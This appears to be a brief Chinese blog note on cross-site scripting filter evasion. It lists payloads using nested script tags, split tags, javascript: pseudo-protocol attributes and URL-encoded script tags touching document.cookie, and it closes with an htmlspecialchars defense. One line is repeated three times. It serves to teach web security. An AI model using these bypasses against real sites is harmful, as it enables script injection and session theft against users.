标签:table ack span tran users tom theme tab 判断
<scr<script>ipt> //若仅过滤一个script,其他不检查
some<<b>script>alert(‘hello‘)<</b>/script //在标签中加标签,防止被过滤
// 伪协议JavaScript <img src=javascript:alert(‘Hello‘)> <table background="javascript:alert(‘Hello’)”>
// 伪协议JavaScript <img src=javascript:alert(‘Hello‘)> <table background="javascript:alert(‘Hello’)”>
// 伪协议JavaScript <img src=javascript:alert(‘Hello‘)> <table background="javascript:alert(‘Hello’)”>
// 编码绕过防御措施 %3cscript%3ealert(document.cookie) %3cscript%3e
// www.myzoo.com/users.php $profile = htmlspecialchars($profile); //htmlspecialchars:把特殊字符(如< /)特殊编码,经过特殊编码后script不会被识别成脚本语言,但显示时仍以字符原样显示
标签:table ack span tran users tom theme tab 判断
原文地址:https://www.cnblogs.com/tianjiazhen/p/12235883.html